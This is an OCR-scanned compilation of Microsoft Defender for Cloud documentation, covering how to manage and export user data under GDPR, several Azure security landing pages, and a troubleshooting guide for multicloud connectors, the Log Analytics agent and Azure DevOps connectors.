New AWS Connector in Microsoft Defender for Cloud 


Manage user data in Microsoft 
Defender for Cloud 


Article e 05/24/2023 


This article provides information about how you can manage the user data in Microsoft 
Defender for Cloud. Managing user data includes the ability to access, delete, or export 
data. 


O Note 


This article provides steps about how to delete personal data from the device or 
service and can be used to support your obligations under the GDPR. For general 
information about GDPR, see the GDPR section of the Microsoft Trust Center 7 


and the GDPR section of the Service Trust portal Z . 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can access customer data within the tool. To learn more about the 
Account Administrator role, see Built-in roles for Azure role-based access control to 
learn more about the Reader, Owner, and Contributor roles. See Azure subscription 
administrators. 


Searching for and identifying personal data 


A Defender for Cloud user can view their personal data through the Azure portal. 
Defender for Cloud only stores security contact details such as email addresses and 
phone numbers. For more information, see Provide security contact details in Microsoft 
Defender for Cloud. 


In the Azure portal, a user can view allowed IP configurations using Defender for Cloud's 
just-in-time VM access feature. For more information, see Manage virtual machine 


access using just-in-time. 


In the Azure portal, a user can view security alerts provided by Defender for Cloud 
including IP addresses and attacker details. For more information, see Managing and 
responding to security alerts in Microsoft Defender for Cloud. 


Classifying personal data 


You don't need to classify personal data found in Defender for Cloud's security contact 
feature. The data saved is an email address (or multiple email addresses) and a phone 
number. Contact data is validated by Defender for Cloud. 


You don't need to classify the IP addresses and port numbers saved by Defender for 
Cloud's just-in-time feature. 


Only a user assigned the role of Administrator can classify personal data by viewing 
alerts in Defender for Cloud. 


Securing and controlling access to personal 
data 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can access security contact data. 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can access their just-in-time policies. 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can view their alerts. 


Updating personal data 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can update security contact data via the Azure portal. 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can update their just-in-time policies. 


An Account Administrator can't edit alert incidents. An alert incident is considered 
security data and is read only. 


Deleting personal data 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can delete security contact data via the Azure portal. 


A Defender for Cloud user assigned the role of Owner, Contributor, or Account 
Administrator can delete the just-in-time policies via the Azure portal. 


A Defender for Cloud user can't delete alert incidents. For security reasons, an alert 
incident is considered read-only data. 


Exporting personal data 


A Defender for Cloud user assigned the role of Reader, Owner, Contributor, or Account 
Administrator can export security contact data by: 


e Copying from the Azure portal 
e Executing the Azure REST API call, GET HTTP: 


HTTP 
GET 


https://<endpoint>/subscriptions/{subscriptionId}/providers/Microsoft.S 
ecurity/securityContacts?api-version={api-version} 


A Defender for Cloud user assigned the role of Account Administrator can export the 
just-in-time policies containing the IP addresses by: 


e Copying from the Azure portal 
e Executing the Azure REST API call, GET HTTP: 


HTTP 
GET 
https://<endpoint>/subscriptions/{subscriptionId}/resourceGroups/{resou 


rceGroup}/providers/Microsoft.Security/locations/{location}/jitNetworkA 
ccessPolicies/default ?api-version={api-version} 


An Account Administrator can export the alert details by: 


e Copying from the Azure portal 
e Executing the Azure REST API call, GET HTTP: 


HTTP 


GET 


https://<endpoint>/subscriptions/{subscriptionId}/providers/microsoft.S 
ecurity/alerts?api-version={api-version} 


For more information, see Get Security Alerts (GET Collection). 


Restricting the use of personal data for 
profiling or marketing without consent 


A Defender for Cloud user can choose to opt out by deleting their security contact data. 
Just-in-time data is considered non-identifiable data and is retained for 30 days. 


Alert data is considered security data and is retained for two years. 


Auditing and reporting 


Audit logs of security contact, just-in-time, and alert updates are maintained in Azure 


Activity Logs. 


Respond to data subject export requests for 
Defender for APIs 


The right of data portability allows data subjects to request a copy of their personal data 
in a structured, common, electronic format that can be transmitted to another data 


controller. 


Manage export and view requests 


You can manage requests to export customer or user data. 


Export customer data (Tenant administrator only) 
As a tenant administrator, you have the ability to export customer data. 
To export customer data: 


1. Send an email to D4aPIS_DSRRequests@microsoft.com that specifies the customer's 
email address in the request. 

2. The Defender for APIs team will respond with an email to the registered tenant's 
administrator email address that will ask for confirmation to export the data. 

3. Acknowledge the confirmation to export the data for the requested customer. The 
exported data will be sent to the tenant administrator's email address. 


Next steps 


What is Microsoft Defender for Cloud? 


Microsoft Defender for loT 


Microsoft Defender for loT provides comprehensive threat detection for loT/OT environments, with 


multiple deployment options that include cloud, on-premises, or hybrid networks. 


O OVERVIEW 
Welcome to 
Defender for 
loT 


O OVERVIEW 
Modernize 


your SOC with 
OT network... 


OT network monitoring 

E Microsoft Defender for loT 
components 

E Subscription billing 

{=} User roles and permissions 

{=} Device inventories 

E Alerts 


{=} Zero Trust and your OT 
networks 


E OT threat monitoring in 
your SOC 


Deploy Defender for loT 
for OT monitoring 


See more > 


GO WHAT'S NEW 
) What's new in 


Defender for 
loT? 


CONCEPT 
Secure 


Enterprise loT 
devices 


Enterprise loT network 
monitoring 


3? Enable Enterprise loT 
security with Defender for 
Endpoint 


Manage Defender for loT 
plans for Enterprise loT 
security monitoring 


Discover Enterprise loT 
devices with an Enterprise 
loT network sensor 


Extra steps and samples for 
Enterprise loT deployment 


RI Frequently asked questions 


See more > 


CONCEPT 
Subscription 


billing 


CONCEPT 
Defender for 


loT users and 
roles 


Defender for loT for 
device builders 


3? Defender for loT security 
agent 

St What's new for the 
Defender for loT security 
agent 

3f Enable Defender for loT on 
your Azure loT Hub 


E Add a resource group to 
your loT solution 


E Create a 
DefenderlotMicroAgent 
module twin 


E Install the Defender for loT 
micro agent 


See more > 


Azure security documentation 


Azure offers security advantages that support your compliance efforts, provide cost-effective 


security for your organization, and help protect your hybrid and multicloud platforms, applications, 


and data. 


WHAT'S NEW 


access solutions 


CONCEPT 


HOW-TO GUIDE 


Learn about the Microsoft Entra 
family of multicloud identity and 


Back up and restore plan to 
protect against ransomware 


Understand security coverage by ð 


the MITRE ATT&CK framework 


CONCEPT 


Sentinel 


Modernize security 
operations 


Introduction to Azure 
security 


{=} Shared responsibilities for 
cloud computing 


{=} Protect against 
ransomware 


Use watchlists in Microsoft 


Data security & 
governance, risk, and 
compliance 


Introduction to information 
protection and governance 
in Microsoft 365 


{=} Azure Policy service 


CONCEPT 
Build a Zero Trust Foundation 


CONCEPT 
Protect your multicloud 


environment with unified 
security management and... 


OVERVIEW 
Combine SIEM and XDR to 


defend against modern attacks £ 


CONCEPT 
Azure Network Security 


Secure identities and 
access 


Securing identity with Zero 
Trust 
E Securing privieged access 


E Building apps with a Zero 
Trust approach to identity 


E Deploy an information 
protection solution with 
Microsoft Purview 


Security guidance for each phase of your cloud 


migration journey 


Strategy and planning 
Define business justification 
and expected outcomes of 
adoption 

Define a security strategy 
Envision a security end state 


Develop a cloud adoption plan 


Continued learning 


Discover learning paths that 
help you improve your security 
in the cloud 


Information protection and 
governance in Microsoft 365 


Secure your cloud applications 
in Azure 


Implement perimeter security 


Implementation and 
operation 
Migrate and modernize 


security operations 
management 


Application migration, 
modernization, and innovation 


Cloud management for 
operations team and architects 


Unlock new technical skills and 
expand capabilities 


Additional security guidance 


Cloud architecture 


Design, build, and continuously 
improve your cloud 
architecture 


Security architecture design 


Security pillar of your 
architecture 


Microsoft Cybersecurity 
Reference Architectures 


Microsoft Learn training 


If you're new to security, build 
your skills with Microsoft Learn 
training 


Azure Security Benchmark 


Best practices and 
recommendations to secure 
your cloud deployments 


Microsoft Security Best 
Practices 


Collection of best practices 
that provide clear actionable 
guidance for security related 
decisions, includes Azure and... 


Microsoft Cloud Adoption 
Framework for Azure 


Secure methodology designed 
to help cloud architects and 
business decision makers 
create and implement securit... 


Azure Well-Architected 
Framework 


Design principles for a securely 
architected system hosted on 
cloud or on-premises 
datacenters 


Secure development 


Learn how to develop and 
deploy secure applications on 
Azure with our sample apps, 
best practices, and guidance 


Security services and capabilities 


Microsoft Sentinel 
See and stop threats before 
they cause harm 

Overview 

Onboard Microsoft Sentinel 


Learn: Cloud-native security 
operations with Microsoft 
Sentinel 


Azure key management 


Key management solutions in 
Azure 


Key management in Azure 


Choosing a key management 
solution 


Microsoft Defender for 
Cloud 


Unify security management 
and advanced threat 
protection across hybrid cloud 
workloads 


Overview 


Protect your resources 


Learn: Mitigate threats using 
Microsoft Defender for Cloud 


Microsoft Defender for 
Cloud Apps 


Cloud Access Security Broker 
(CASB) that operates on 
multiple clouds 


Overview 


Azure security 
fundamentals 
For every phase of your cloud 


journey, learn how to secure 
your cloud solutions on Azure 


Azure Architecture Center 


A set of guiding tenets that 
can be used to protect your 
applications and data from 

threats 


Microsoft Defender for 
Identity 


Improve security of hybrid 
environments from cyber 
attacks and insider threats 


Overview 


Deploy Microsoft Defender for 
Identity with Microsoft 365 
Defender 


Learn: Defend against attacks 


Microsoft Defender for 
loT 


Threat detection for loT/OT 
environments 


Overview 


Azure Key Vault 
Azure Managed HSM 
Azure Dedicated HSM 


Azure Payment-HSM 


Azure Information 
Protection 


Control and secure emails, 
documents, and sensitive data 
Overview 

Deploying the client 


Discovering your sensitive 
content 


Get started 


Detect and manage suspicious 
activity 


Learn: Secure your cloud apps 
and services 


Microsoft Entra ID 


Multi-tenant, cloud-based 
identity and access 
management service 


Overview 


Security operations guide 


Learn: Secure Microsoft Entra 
users with Multi-Factor 
Authentication 


Get started with Defender for 
loT 


Learn: Enhance loT solution 
security 


Microsoft 365 
Defender 


Security solutions that protect 
your enterprise across attack 
surfaces 

Overview 


Get started 


Security operations guide 


Microsoft Defender for Cloud 
Troubleshooting Guide 


Article e 06/18/2023 


This guide is for information technology (IT) professionals, information security analysts, 
and cloud administrators whose organizations need to troubleshoot Defender for Cloud 


related issues. 


Q Tip 


When you're facing an issue or need advice from our support team, the Diagnose 


and solve problems section of the Azure portal is good place to look for solutions: 


ZO Microsoft Defender for Cloud | Diagnose and solve problems 


Showing 54 subscriptions 


[e Search (Ctrl+/) | « 


| Æ Search for common problems, tools and more 


General 

Ọ overview 

@ Getting started 

ZZ Recommendations 
@ Security alerts 

© Inventory 

@ workbooks 


GO Community 


P Diagnose and solve problems 


Cloud Security 
Ọ Secure Score 


@ Regulatory compliance 


9 Microsoft Defender for Cloud 


E Firewall Manager 


Management 

I Pricing & settings 
E Security policy 
E Security solutions 


ZA Workflow automation 


Common problems 


Explore the most common problems for your resource. Select Troubleshoot to run an automated troubleshooter, 
follow do-it-yourself troubleshooting steps, or explore a wide range of troubleshooting tools. 


Category = All (7) Group by category 


Microsoft Defender Features 


Adaptive Application Control (AAC). Just-in-time Access (JIT), 
File Integrity Monitoring (FIM), Vulnerability Assessme... 


Troubleshoot 


Portal and UI 
For any unexpected display of the Graphical User Interface (UI) 


Troubleshoot 


Recommendations operations and management 


Recommendations exemptions, Enforce or Deny, Custom 
Recommendations issues, Compliance assignments, Sec... 


Troubleshoot 


Security Alerts Investigation 


Questions and issues regarding security alerts 


Troubleshoot 


Onboarding 


Onboarding or offboarding ASC 


Troubleshoot 


Pricing, Billing and Usage 
Data usage, billing queries and pricing issues 


Troubleshoot 


Recommendations remediation 


Recommendation description, remediation steps or reasons 
are unclear, recommendation resources wrongly indicated 


Troubleshoot 


Settings and configurations issues 

Questions regarding the various Microsoft Defender for Cloud 
settings and configurations 

Troubleshoot 


Use the Audit Log to investigate issues 


The first place to look for troubleshooting information is the Audit Log records records 


for the failed component. In the audit logs, you can see details including: 


e Which operations were performed 


e Who initiated the operation 


e When the operation occurred 


e The status of the operation 


The audit log contains all write operations (PUT, POST, DELETE) performed on your 
resources, but not read operations (GET). 


Troubleshooting the native multicloud 
connector 


Defender for Cloud uses connectors to collect monitoring data from AWS accounts and 
GCP projects. If you're experiencing issues with the connector or you don't see data 
from AWS or GCP, we recommend that you review these troubleshooting tips: 


Common connector issues: 


e Make sure that the subscription associated with the connector is selected in the 
subscriptions filter, located in the Directories + subscriptions section of the Azure 
portal. 

e Standards should be assigned on the security connector. To check, go to the 
Environment settings in the Defender for Cloud left menu, select the connector, 
and select Settings. There should be standards assigned. You can select the three 
dots to check if you have permissions to assign standards. 

e Connector resource should be present in Azure Resource Graph (ARG). Use the 
following ARG query to check: resources | where ['type'] =~ 
"microsoft.security/securityconnectors" 

e Make sure that sending Kubernetes audit logs is enabled on the AWS or GCP 
connector so that you can get threat detection alerts for the control plane. 

e Make sure that Azure Arc and the Azure Policy Arc extension were installed 
successfully. 

e Make sure that the agent is installed to your Elastic Kubernetes Service (EKS) 
clusters. You can install the agent with the Azure Policy add-on for Kubernetes 
should be installed and enabled on your clusters recommendation, or Azure 
policy extension for Kubernetes should be installed and enabled on your clusters 
recommendations. Download the given script provided in the recommendation 
and run it on your cluster. The recommendation should disappear within an hour 
of when the script is run. 

e If you're experiencing issues with deleting the AWS or GCP connector, check if you 
have a lock (in this case there might be an error in the Azure Activity log, hinting at 
the presence of a lock). 

e Check that workloads exist in the AWS account or GCP project. 


AWS connector issues: 


e Make sure that the CloudFormation template deployment completed successfully. 

e You need to wait at least 12 hours since the AWS root account was created. 

e Make sure that EKS clusters are successfully connected to Arc-enabled Kubernetes. 

e If you don't see AWS data in Defender for Cloud, make sure that the AWS 
resources required to send data to Defender for Cloud exist in the AWS account. 


GCP connector issues: 


e Make sure that the GCP Cloud Shell script completed successfully. 

e Make sure that GKE clusters are successfully connected to Arc-enabled Kubernetes. 

e Make sure that Azure Arc endpoints are in the firewall allowlist. The GCP connector 
makes API calls to these endpoints to fetch the necessary onboarding files. 

e |f the onboarding of GCP projects failed, make sure you have 
“compute.regions.list” permission and Azure AD permission to create the service 
principle used as part of the onboarding process. Make sure that the GCP 
resources WorkloadIdentityPoolId, WorkloadIdentityProviderld, and 


ServiceAccountEmail are created in the GCP project. 


Troubleshooting the Log Analytics agent 


Defender for Cloud uses the Log Analytics agent to collect and store data. The 
information in this article represents Defender for Cloud functionality after transition to 
the Log Analytics agent. 


Alert types: 


Virtual Machine Behavioral Analysis (VMBA) 
Network Analysis 


SQL Database and Azure Synapse Analytics Analysis 
Contextual Information 


Depending on the alert types, customers can gather the necessary information to 
investigate the alert by using the following resources: 


e Security logs in the Virtual Machine (VM) event viewer in Windows 
e AuditD in Linux 
e The Azure activity logs and the enable diagnostic logs on the attack resource. 


Customers can share feedback for the alert description and relevance. Navigate to the 
alert itself, select the Was This Useful button, select the reason, and then enter a 
comment to explain the feedback. We consistently monitor this feedback channel to 
improve our alerts. 


Check the Log Analytics agent processes and versions 


Just like the Azure Monitor, Defender for Cloud uses the Log Analytics agent to collect 
security data from your Azure virtual machines. After data collection is enabled and the 
agent is correctly installed in the target machine, the HealthService.exe process should 


be running. 


Open the services management console (services.msc), to make sure that the Log 
Analytics agent service running as shown below: 


$ Services = D x 
File Action View Help 

es TEB Hm|?» aun 

-A Services (Local) o Services (Local) 


Microsoft Monitoring Agent Name Description Status Startup Type Log On As a 
Š GA MessagingService_574c8f Service supporting tex... Manual (Trig... Local System 
dedi (E Microsoft (R) Diagnostics Hub Standard Collector Service Diagnostics Hub Stan... Manual Local System 
‘Reckad the sevice ISk Microsoft Account Sign-in Assistant Enables user sign-in t.. Running Manual (Trig... Local System 
EEE @ Microsoft App-V Client Manages App-V users ... Disabled Local System 
ESO (Eu Microsoft iSCSI Initiator Service Manages Internet SCSI... Manual Local System 
Description: 


+1 Microsoft Monitoring Agent The Monitoring Agent... Running Automatic Local System 


The Monitoring Anent service 


To see which version of the agent you have, open Task Manager, in the Processes tab 
locate the Log Analytics agent Service, right-click on it and select Properties. In the 
Details tab, look the file version as shown below: 


rz Task Manager = D x 


File Options View 


Processes Performance App history Startup Users Details Services 


a 
4% 59% 17% 0 
Name CPU Memory Disk Networl General Compatibility Digital Signatures 
Security Details Previous Versi 
> [E Microsoft Monitoring Agent Service ne% 93MB  0.1MB/s ONO EEE EEE 
N) Microsoft Office Click-to-Run (SxS) Eda 18.5 MB OMB/s ON Property Value 
E € s Description 
@® Microsoft OneDrive (32 bit > 2.0 MB OMB/s ON 
t ) SEDER tS File description Microsoft Monitoring Agent Service 
[E] Microsoft Skype Create dump file 3.1MB OMB/s OM Type Application 
File version 8.0.11049.0 
é Microsoft Windows Search Filter Host Go to details 0.8 MB D MB/s OM Product name Hera Agent 
da Microsoft Windows Search Indexer Open file location 7.2 MB OMB/s ON Product version 8.0.11049.0 
i Copyri Copyright © 1995-2016 Microsoft Com. 
& Microsoft Windows Search Protocol eS 1.1 MB D MB/s ON 5 E errea e 
Properties ue ` 
EE Microsoft® Microsoft Online Servic 0.7 MB OMB/s OM Date modified 2/7/2017 9:36 AM 
Language English (United States) 
EE Microsoft® Microsoft Online Services ID Service Monitor 0% 0.1 MB O MB/s OM Loyal traders. Marta regutered tradewint of .. 
[E] Microsoft® Volume Shadow Copy Service 0% 0.7 MB O MB/s ON Original filename _ HealthService.exe 


Log Analytics agent installation scenarios 


There are two installation scenarios that can produce different results when installing 
the Log Analytics agent on your computer. The supported scenarios are: 


e Agent installed automatically by Defender for Cloud: You can view the alerts in 
Defender for Cloud and Log search. You'll receive email notifications to the email 
address that was configured in the security policy for the subscription the resource 
belongs to. 


e Agent manually installed on a VM located in Azure: in this scenario, if you're 
using agents downloaded and installed manually prior to February 2017, you can 


view the alerts in the Defender for Cloud portal only if you filter on the 
subscription the workspace belongs to. If you filter on the subscription the 
resource belongs to, you won't see any alerts. You'll receive email notifications to 
the email address that was configured in the security policy for the subscription 
the workspace belongs to. 


© Note 


To avoid the behavior explained in the second scenario, make sure you download 
the latest version of the agent. 


Monitoring agent network connectivity issues 


For agents to connect to and register with Defender for Cloud, they must have access to 
the DNS addresses and network ports for Azure network resources. 


e When you use proxy servers, you need to make sure that the appropriate proxy 
server resources are configured correctly in the agent settings. 
e You need to configure your network firewalls to permit access to Log Analytics. 


The Azure network resources are: 


Agent Resource Ports Bypass HTTPS inspection 
* ods.opinsights.azure.com 443 Yes 
* oms.opinsights.azure.com 443 Yes 
* blob.core.windows.net 443 Yes 
* azure-automation.net 443 Yes 


If you're having trouble onboarding the Log Analytics agent, make sure to read how to 
troubleshoot Operations Management Suite onboarding issues £. 


Antimalware protection isn't working properly 


The guest agent is the parent process of everything the Microsoft Antimalware 
extension does. When the guest agent process fails, the Microsoft Antimalware 
protection that runs as a child process of the guest agent may also fail. 


Here are some other troubleshooting tips: 


e If the target VM was created from a custom image, make sure that the creator of 
the VM installed guest agent. 

e If the target is a Linux VM, then installing the Windows version of the antimalware 
extension will fail. The Linux guest agent has specific OS and package 
requirements. 

e |f the VM was created with an old version of guest agent, the old agents might not 
have the ability to auto-update to the newer version. Always use the latest version 
of guest agent when you create your own images. 

e Some third-party administration software may disable the guest agent, or block 
access to certain file locations. If third-party administration software is installed on 
your VM, make sure that the antimalware agent is on the exclusion list. 

e Make sure that firewall settings and Network Security Group (NSG) aren't blocking 
network traffic to and from guest agent. 

e Make sure that there are no Access Control Lists (ACLs) that prevent disk access. 

e The guest agent requires sufficient disk space in order to function properly. 


By default the Microsoft Antimalware user interface is disabled, but you can enable the 
Microsoft Antimalware user interface on Azure Resource Manager VMs. 


Troubleshooting problems loading the 
dashboard 


If you experience issues loading the workload protection dashboard, make sure that the 
user that first enabled Defender for Cloud on the subscription and the user that want to 
turn on data collection have the Owner or Contributor role on the subscription. If that is 
the case, users with the Reader role on the subscription can see the dashboard, alerts, 
recommendations, and policy. 


Troubleshoot Azure DevOps Organization 
connector issues 


The Unable to find Azure DevOps Organization error occurs when you create an Azure 


DevOps Organization (ADO) connector and the incorrect account was signed in and 
granted access to the Microsoft Security DevOps App. This can also result in the Failed 
to create Azure DevOps connectorFailed to create Azure DevOps connector. Error: 
"Unable to find Azure DevOps organization : OrganizationX in available 


organizations: Organization1, Organization2, Organization3.' error. 


It is important to know which account you are logged in to when you authorize the 
access, as that will be the account that is used. Your account can be associated with the 
same email address but also associated with different tenants. 


You should check which account“ you are currently logged in on and ensure that the 
right account and tenant combination is selected. 


Q Microsoft Security DevOps Canary » microsoft 


App requests the following permissions from: connie.wilson@contoso.com (Microsoft) 


Identity (read) 


Grants the ability to read identities and groups. 


Service hooks (read and write) 


Grants the ability to create and update service hook subscriptions and read metadata, including supported events, consumers, and actions. 
Work items (read and write) 
Grante tha ahilitu ta raad rrasta and indata warb itame and miariac urnieta hoard matadata raad araa and itaratinne nathe nthar wark itam 


To change your current account: 


1. Select profile page. 


Notifications (diagnostics) 


Provides access to notification-related diagnostic logs and provides the ability to enable diagnostics for individual subscriptions. 


Audit Read Log 


Grants the ability to read the auditing log and audit streams to users 


Audit Manage Streams 


Grants the ability to manage auditing streams to users 


Learn more 


If you change your mind at any time, you can manage authorizations on youf profile page. 


By clicking Accept, you allow this app to perform the above actions on your behalf and you agree to Microsoft Terms of Use and Privacy Statement. 


2. On your profile page, select the drop down menu to select another account. 


K K Edit profile 


Microsoft 


Default Directory 


kinfos 
Kinfos Solutions 
Microsoft 


Visual Studio Dev Essentials 


Get everything you need to build and deploy your app 


on any platform. 


Use your benefits 


Auitharivzatiane 


The first time you authorize the Microsoft Security application, you are given the ability 
to select an account. However, each time you login after that, the page defaults to the 
logged in account without giving you the chance to select an account. 


To change the default account: 
1. Sign inZ and select the same tenant you use in Azure from the dropdown menu. 


2. Create a new connector, and authorize it. When the pop-up page appears, ensure 
it shows the correct tenant. 


If this process does not fix your issue, you should revoke Microsoft Security DevOps's 
permission from all tenants in Azure DevOps and repeat the above steps. You should 
then be able to see the authorization pop up again when authorizing the connector. 


Microsoft Security DevOps (Microsoft) 

Grants the ability to read identities and groups. 

Grants the ability to create and update service hook subscriptions and read metadata, including supported events, consumers, and actions. 

Grants the ability to read, create, and update work items and queries, update board metadata, read area and iterations paths other work item tracking related metadata, execute queries, and to receive notifications about work item events via service 
hooks. 

Grants the ability to access build artifacts, including build results, definitions, and requests, and the ability to queue a build, update build properties, and the ability to receive notifications about build events via service hooks. 

Grants the ability to read, update, and delete source code, access metadata about commits, changesets, branches, and other version control artifacts. Also grants the ability to create and manage pull requests and code reviews and to receive 
notifications about version control events via service hooks. 

Grants the ability to read and write to pull request comment threads. 

Grants the ability to view tasks, pools, queues, agents, and currently running or recently completed jobs for agents 

Grants the ability to read feeds and packages. Also grants the ability to search packages. 


Grants the ability to read installed extensions. 
Provides read only access to VSTS licensing entitlements endpoint to get account entitlements. 


Grants the ability to read release artifacts, including folders, releases, release definitions and release environment. 


Grants the ability to read secure files. 

Grants the ability to read task groups 

Grants the ability to read variable groups 

Grants the ability to read service endpoints. 

Grants the ability to read projects and teams. 

Grants the ability to read symbols. 

Grants the ability to read user, group, scope and group membership information Q 


Grants the ability to read users, their licenses as well as projects and extensions they can access 
Provides access to notification-related diagnostic logs and provides the ability to enable diagnostics for individual subscriptions. 
Grants the ability to read the auditing log and audit streams to users 

Grants the ability to manage auditing streams to users 


Contacting Microsoft Support 


You can also find troubleshooting information for Defender for Cloud at the Defender 
for Cloud Q&A page. If you need further troubleshooting, you can open a new support 
request using Azure portal as shown below: 


Home 


2 Help + support 


Search (Ctrl+/ « 
ctl Sl A Create a support request GO Choose the right support plan 


B overview 


Service health 


Support 
eo No Azure service issue detected. View service health 
E) All support requests 
@ Support Plans k ; 

Have an issue with your resource? 
E Service Health Select Troubleshoot to get targeted solutions for your recently visited resource. 
® Advisor 

Name Type Last viewed 


No recently visited resources 


See also 


In this page, you learned about troubleshooting steps for Defender for Cloud. To learn 
more about Microsoft Defender for Cloud: 


e Learn how to manage and respond to security alerts in Microsoft Defender for 


Cloud 
e Alert validation in Microsoft Defender for Cloud 


e Review common questions about using Microsoft Defender for Cloud 


